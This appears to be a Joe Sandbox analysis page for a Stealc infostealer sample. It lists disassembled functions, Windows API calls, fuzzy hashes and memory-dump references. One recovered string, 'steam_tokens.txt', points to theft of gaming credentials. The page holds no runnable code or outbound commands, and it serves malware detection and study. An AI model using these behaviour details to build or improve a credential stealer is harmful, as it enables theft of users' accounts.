Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 363b41a9f0575c4cf575f60068831cf3c6b7f962fb0ac7e69a9c44d092779b18
Instruction ID: a0ddc40a6df0c169cae25c0f54e179277a36e861ccdcaab60d7d2caa0d316d23
Opcode Fuzzy Hash: 363b41a9f0575c4cf575f60068831cf3c6b7f962fb0ac7e69a9c44d092779b18
Instruction Fuzzy Hash: 4B41BE77540204A7C7A4F7A0FC52DEE373DAB84700F004658B65957186EE799BCC9F92

Function 00F25050 Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00F28E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00F2508A
lstrcatA.KERNEL32(?,01780F30), ref: 00F250A8

Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F2492C
Part of subcall function 00F24910: FindFirstFileA.KERNEL32(?,?), ref: 00F24943

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 80201b2d6f337ce2003e7dc613148c156f11244e786f41518427f055965765a1
Instruction ID: 449987b990d5fea169798ef6733a381a24d303d13cfcb7cddd3bc78ab9bd0592
Opcode Fuzzy Hash: 80201b2d6f337ce2003e7dc613148c156f11244e786f41518427f055965765a1
Instruction Fuzzy Hash: E201C876940218A7CB64FB70FC43DEE333CAF54740F004254B65953081EE789AC99B91

Function 00F25100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A820: lstrlenA.KERNEL32(00000000,?,?,00F25B54,00F30ADB,00F30ADA,?,?,00F26B16,00000000,?,017703D0,?,00F3110C,?,00000000), ref: 00F2A82B
Part of subcall function 00F2A820: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A885

lstrlenA.KERNEL32(00000000,00000000,00F30ACA,?,?,?,?,?,?,00F2610B,?), ref: 00F2512A

Strings

steam_tokens.txt, xrefs: 00F2513F

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: ba19bf5f246a1ba98983596dfbe129bea6b43784d5270016a9e081aa379b9cf0
Instruction ID: 934a2f074c807524010dfd8c01f16e14dd49e714fc80fcf98a5a9769a1c22bcc
Opcode Fuzzy Hash: ba19bf5f246a1ba98983596dfbe129bea6b43784d5270016a9e081aa379b9cf0
Instruction Fuzzy Hash: 22F0F671910118A7CB08FBA0FC579ED733CAF54300F404268F91662092EF2CAA19EAA7

Function 00F27ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00F30E2C), ref: 00F27F00
wsprintfA.USER32 ref: 00F27F16

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 793c4f46d5741d9926f02f32f4c28eb5320aedc13b984d6346263d93e221c7fb
Instruction ID: e4b3460056c04039bd542b6b87201278ebf11ec2eef88f4e7f79b8e93b7c64aa
Opcode Fuzzy Hash: 793c4f46d5741d9926f02f32f4c28eb5320aedc13b984d6346263d93e221c7fb
Instruction Fuzzy Hash: 65F0F6B1944318EBCB14CF84EC45FAAFBBCFB44720F000669F51593280D77569408BE1

Function 00F1B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F19E10: memcmp.MSVCRT(?,v20,00000003), ref: 00F19E2D

lstrlenA.KERNEL32(00000000), ref: 00F1B9C2
lstrlenA.KERNEL32(00000000), ref: 00F1B9D6

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: 81614e33d161014adb959d95d39802cb62d7729ab69e6c4bb7546005a807f7b0
Instruction ID: 5da1a3a1fd0a39787b0df5f1f5d0ef8629e63d7b62406934ea4373cf0b9e1a72
Opcode Fuzzy Hash: 81614e33d161014adb959d95d39802cb62d7729ab69e6c4bb7546005a807f7b0
Instruction Fuzzy Hash: 36E103729101289BDB19FBA0ECA2EEE733CBF54300F404569F51767091EF386A59DB62

Function 00F1AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

lstrlenA.KERNEL32(00000000), ref: 00F1B16A
lstrlenA.KERNEL32(00000000), ref: 00F1B17E

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 2d1078f674c31629b0110c750e4e2f05603eb033e94972884d4ef9dad94956f4
Instruction ID: 5abb524ebc2ababc380c537c04c21aec4bda78c96b496473c9f3e2a0ce6a4f27
Opcode Fuzzy Hash: 2d1078f674c31629b0110c750e4e2f05603eb033e94972884d4ef9dad94956f4
Instruction Fuzzy Hash: B89115729101289BDF18FBA0EC66DEE7338BF54300F404569F517A7091EF386A59DBA2

Function 00F1B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

lstrlenA.KERNEL32(00000000), ref: 00F1B42E
lstrlenA.KERNEL32(00000000), ref: 00F1B442

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: cfe3cb0c6736acc60a67d4f91d33576fbcf639068d77cc656a9d1d5951f2ed98
Instruction ID: f4d0822b5e35787d48304716671b9aa2bc81512deb3433e42f52b73fd1f24a51
Opcode Fuzzy Hash: cfe3cb0c6736acc60a67d4f91d33576fbcf639068d77cc656a9d1d5951f2ed98
Instruction Fuzzy Hash: 7F711571910128DBDB18FBA0ED66DEE7378BF54300F404528F517A7091EF386A59EBA2

Function 00F16660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00F16DBE,00F16DBE,00003000,00000040), ref: 00F16706
VirtualAlloc.KERNEL32(00000000,00F16DBE,00003000,00000040), ref: 00F16753

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4a6ff928a645d23be90d0edf93b70b883441655e5632e50e70fefeee3504163a
Instruction ID: ed05932277fb641efaa02d1096f4a199e5dd10f7107335c72fe70083dc8cd5f2
Opcode Fuzzy Hash: 4a6ff928a645d23be90d0edf93b70b883441655e5632e50e70fefeee3504163a
Instruction Fuzzy Hash: 4341B874A00209EFCB54CF58C494BEDBBB1FF48315F2482A9E9599B385D731AAC1DB84

Function 00F110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,00F1114E,?,?,00F26A1C), ref: 00F110B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,00F1114E,?,?,00F26A1C), ref: 00F110F7

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c9056cf16cea5a8a8dd73c7bbc62e6be4d11ebfbc27e982eecc1eb7399ed948b
Instruction ID: 32a428c6eedb0a102923f83ca5be1ce1c92a9f49513fb43f800926ee274b9e44
Opcode Fuzzy Hash: c9056cf16cea5a8a8dd73c7bbc62e6be4d11ebfbc27e982eecc1eb7399ed948b
Instruction Fuzzy Hash: 17F0E971A81314BBE71496A4AC49FAEB7D8EB05B15F300554F604E3280D5715E80DB50

Function 00F28D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00F20117,?,00000000,?,00000000,00F30DAB,00F30DAA), ref: 00F28D9F

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
